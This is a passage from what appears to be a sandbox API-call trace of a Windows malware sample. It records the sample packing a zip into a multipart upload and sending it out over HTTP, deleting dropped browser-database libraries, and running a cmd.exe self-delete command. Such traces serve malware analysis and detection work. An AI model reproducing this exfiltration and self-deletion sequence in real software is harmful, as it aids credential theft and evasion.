lpString2="MY58GDTJM7GVAAAI" | out: lpString1="------MY58GDTJM7GVAAAI") returned="------MY58GDTJM7GVAAAI" [0237.973] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI", lpString2="\r\n" | out: lpString1="------MY58GDTJM7GVAAAI\r\n") returned="------MY58GDTJM7GVAAAI\r\n" [0237.973] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\n", lpString2="Content-Disposition: form-data; name=\"" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"" [0237.973] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"", lpString2="file" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file" [0237.973] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file", lpString2="\"\r\n\r\n" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n" [0237.973] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n", lpString2="ASR1DBSJMYMYM7.zip" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip" [0237.973] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip", lpString2="\r\n" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n" [0237.973] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n", lpString2="------" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------" [0237.973] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------", lpString2="MY58GDTJM7GVAAAI" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI" [0237.973] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI", lpString2="\r\n" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\n") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\n" [0237.973] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\n", lpString2="Content-Disposition: form-data; name=\"file\"; filename=\"" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"" [0237.974] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"", lpString2="ASR1DBSJMYMYM7.zip" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip" [0237.974] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip", lpString2="\"\r\n" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\n") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\n" [0237.974] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\n", lpString2="Content-Type: application/octet-stream" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream" [0237.974] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream", lpString2="\r\n" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream\r\n") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream\r\n" [0237.974] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream\r\n", lpString2="Content-Transfer-Encoding: binary" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary" [0237.974] lstrcatA (in: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary", lpString2="\r\n\r\n" | out: lpString1="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n" [0237.974] lstrlenA (lpString="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned 268 [0237.974] lstrlenA (lpString="\r\n------MY58GDTJM7GVAAAI--\r\n") returned 28 [0237.974] GetProcessHeap () returned 0x6b0000 [0237.974] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16431) returned 0xff58530 [0237.975] lstrlenA (lpString="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned 268 [0237.975] lstrlenA (lpString="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned 268 [0237.976] lstrlenA (lpString="\r\n------MY58GDTJM7GVAAAI--\r\n") returned 28 [0237.976] lstrlenA (lpString="------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\nASR1DBSJMYMYM7.zip\r\n------MY58GDTJM7GVAAAI\r\nContent-Disposition: form-data; name=\"file\"; filename=\"ASR1DBSJMYMYM7.zip\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n\r\n") returned 268 [0237.976] lstrlenA (lpString="Content-Type: multipart/form-data; boundary=----MY58GDTJM7GVAAAI") returned 64 [0237.977] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=----MY58GDTJM7GVAAAI", dwHeadersLength=0x40, lpOptional=0xff58530*, dwOptionalLength=0x16431) returned 1 [0239.513] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x196d18, lpdwBufferLength=0x196e18, lpdwIndex=0x0 | out: lpBuffer=0x196d18*, lpdwBufferLength=0x196e18*=0x3, lpdwIndex=0x0) returned 1 [0239.513] StrCmpCA (pszStr1="200", pszStr2="200") returned 0 [0239.513] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x196530, dwNumberOfBytesToRead=0x7cf, lpdwNumberOfBytesRead=0x196528 | out: lpBuffer=0x196530*, lpdwNumberOfBytesRead=0x196528*=0x0) returned 1 [0239.513] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0239.514] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0239.514] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0239.515] CryptStringToBinaryA (in: pszString="", cchString=0x0, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x1964f0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x1964f0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.935] CryptStringToBinaryA (in: pszString="", cchString=0x0, dwFlags=0x1, pbBinary=0x1916cc, pcbBinary=0x1964f0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x1916cc, pcbBinary=0x1964f0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.936] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0239.937] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\" (normalized: "c:\\programdata")) returned 1 [0239.938] lstrlenA (lpString="") returned 0 [0239.940] DeleteFileA (lpFileName="C:\\ProgramData\\sqlite3.dll" (normalized: "c:\\programdata\\sqlite3.dll")) returned 0 [0239.971] DeleteFileA (lpFileName="C:\\ProgramData\\freebl3.dll" (normalized: "c:\\programdata\\freebl3.dll")) returned 0 [0239.972] DeleteFileA (lpFileName="C:\\ProgramData\\mozglue.dll" (normalized: "c:\\programdata\\mozglue.dll")) returned 0 [0239.972] DeleteFileA (lpFileName="C:\\ProgramData\\msvcp140.dll" (normalized: "c:\\programdata\\msvcp140.dll")) returned 0 [0239.972] DeleteFileA (lpFileName="C:\\ProgramData\\nss3.dll" (normalized: "c:\\programdata\\nss3.dll")) returned 0 [0239.972] DeleteFileA (lpFileName="C:\\ProgramData\\softokn3.dll" (normalized: "c:\\programdata\\softokn3.dll")) returned 0 [0239.972] DeleteFileA (lpFileName="C:\\ProgramData\\vcruntime140.dll" (normalized: "c:\\programdata\\vcruntime140.dll")) returned 0 [0239.973] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19fe08, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\b123.exe")) returned 0x26 [0239.973] wsprintfA (in: param_1=0x19fd00, param_2="/c timeout /t 5 & del /f /q \"%s\" & exit" | out: param_1="/c timeout /t 5 & del /f /q \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\" & exit") returned 75 [0239.975] ShellExecuteExA (in: pExecInfo=0x19ff14*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Windows\\System32\\cmd.exe", lpParameters="/c timeout /t 5 & del /f /q \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\" & exit", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x19ff14*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Windows\\System32\\cmd.exe", lpParameters="/c timeout /t 5 & del /f /q \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\" & exit", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0242.560] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x12fc Thread: id = 3 os_tid = 0x7b4 [0226.121] Sleep (dwMilliseconds=0x64) [0227.050] Sleep (dwMilliseconds=0x64) [0227.193] Sleep (dwMilliseconds=0x64) [0227.816] Sleep (dwMilliseconds=0x64) [0228.063] Sleep (dwMilliseconds=0x64) [0228.337] Sleep (dwMilliseconds=0x64) [0229.042] Sleep (dwMilliseconds=0x64) [0229.477] Sleep (dwMilliseconds=0x64) [0229.906] Sleep (dwMilliseconds=0x64) [0230.468] Sleep (dwMilliseconds=0x64) [0231.316] Sleep (dwMilliseconds=0x64) [0231.730] Sleep (dwMilliseconds=0x64) [0231.844] Sleep (dwMilliseconds=0x64) [0231.946] Sleep (dwMilliseconds=0x64) [0232.067] Sleep (dwMilliseconds=0x64) [0232.194] Sleep (dwMilliseconds=0x64) [0232.360] Sleep (dwMilliseconds=0x64) [0232.487] Sleep (dwMilliseconds=0x64) [0232.601] Sleep (dwMilliseconds=0x64) [0232.769] Sleep (dwMilliseconds=0x64) [0232.870] Sleep (dwMilliseconds=0x64) [0232.971] Sleep (dwMilliseconds=0x64) [0233.073] Sleep (dwMilliseconds=0x64) [0233.184] Sleep (dwMilliseconds=0x64) [0233.285] Sleep (dwMilliseconds=0x64) [0233.449] Sleep (dwMilliseconds=0x64) [0233.551] Sleep (dwMilliseconds=0x64) [0233.669] Sleep (dwMilliseconds=0x64) [0234.260] Sleep (dwMilliseconds=0x64) [0234.398] Sleep (dwMilliseconds=0x64) [0234.522] Sleep (dwMilliseconds=0x64) [0234.675] Sleep (dwMilliseconds=0x64) [0234.809] Sleep (dwMilliseconds=0x64) [0234.938] Sleep (dwMilliseconds=0x64) [0235.074] Sleep (dwMilliseconds=0x64) [0235.192] Sleep (dwMilliseconds=0x64) [0236.005] Sleep (dwMilliseconds=0x64) [0236.386] Sleep (dwMilliseconds=0x64) [0236.492] Sleep (dwMilliseconds=0x64) [0236.622] Sleep (dwMilliseconds=0x64) [0237.379] Sleep (dwMilliseconds=0x64) [0237.636] Sleep (dwMilliseconds=0x64) [0237.821] Sleep (dwMilliseconds=0x64) [0237.921] Sleep (dwMilliseconds=0x64) [0238.046] Sleep (dwMilliseconds=0x64) [0238.149] Sleep (dwMilliseconds=0x64) [0238.282] Sleep (dwMilliseconds=0x64) [0238.434] Sleep (dwMilliseconds=0x64) [0238.585] Sleep (dwMilliseconds=0x64) [0238.692] Sleep (dwMilliseconds=0x64) [0238.860] Sleep (dwMilliseconds=0x64) [0238.979] Sleep (dwMilliseconds=0x64) [0239.154] Sleep (dwMilliseconds=0x64) [0239.268] Sleep (dwMilliseconds=0x64) [0239.378] Sleep (dwMilliseconds=0x64) [0239.488] Sleep (dwMilliseconds=0x64) [0239.623] Sleep (dwMilliseconds=0x64) [0239.739] Sleep (dwMilliseconds=0x64) [0239.843] Sleep (dwMilliseconds=0x64) [0239.979] Sleep (dwMilliseconds=0x64) [0240.659] Sleep (dwMilliseconds=0x64) [0240.825] Sleep (dwMilliseconds=0x64) [0240.930] Sleep (dwMilliseconds=0x64) [0241.766] Sleep (dwMilliseconds=0x64) [0242.139] Sleep (dwMilliseconds=0x64) [0242.530] Sleep (dwMilliseconds=0x64) Thread: id = 4 os_tid = 0x928 Thread: id = 5 os_tid = 0x4dc Thread: id = 6 os_tid = 0xe80 Thread: id = 7 os_tid = 0x678 Thread: id = 8 os_tid = 0xc48 Thread: id = 9 os_tid = 0xe34 Thread: id = 10 os_tid = 0xab0 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x476cd000" os_pid = "0x554" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x7fc" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c timeout /t 5 & del /f /q \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\" & exit" cur_dir = "C:\\ProgramData\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 408 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 409 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 410 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 411 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 412 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 413 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 414 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 415 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 416 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 417 start_va = 0x1190000 end_va = 0x11e1fff monitored = 1 entry_point = 0x11a4fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 418 start_va = 0x11f0000 end_va = 0x51effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 419 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 420 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 421 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 422 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 423 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 424 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 425 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 428 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 429 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 430 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 431 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 432 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 433 start_va = 0x5d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 434 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 435 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 436 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 437 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 521 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 522 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 523 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 524 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 525 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 526 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 527 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 528 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 529 start_va = 0x8d0000 end_va = 0xc06fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 11 os_tid = 0x7e8 [0262.428] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0262.428] GetProcessHeap () returned 0x6d0000 [0262.428] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x400a) returned 0x6db698 [0262.428] GetProcessHeap () returned 0x6d0000 [0262.429] RtlFreeHeap (HeapHandle=0x6d0000, Flags=0x0, BaseAddress=0x6db698) returned 1 [0262.430] _wcsicmp (_String1="timeout", _String2=")") returned 75 [0262.430] _wcsicmp (_String1="FOR", _String2="timeout") returned -14 [0262.430] _wcsicmp (_String1="FOR/?", _String2="timeout") returned -14 [0262.430] _wcsicmp (_String1="IF", _String2="timeout") returned -11 [0262.430] _wcsicmp (_String1="IF/?", _String2="timeout") returned -11 [0262.430] _wcsicmp (_String1="REM", _String2="timeout") returned -2 [0262.430] _wcsicmp (_String1="REM/?", _String2="timeout") returned -2 [0262.430] GetProcessHeap () returned 0x6d0000 [0262.430] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x58) returned 0x6d8f28 [0262.430] GetProcessHeap () returned 0x6d0000 [0262.430] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x18) returned 0x6d78a0 [0262.431] GetProcessHeap () returned 0x6d0000 [0262.431] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x16) returned 0x6d7880 [0262.431] GetProcessHeap () returned 0x6d0000 [0262.431] RtlAllocateHeap (HeapHandle=0x6d0000, 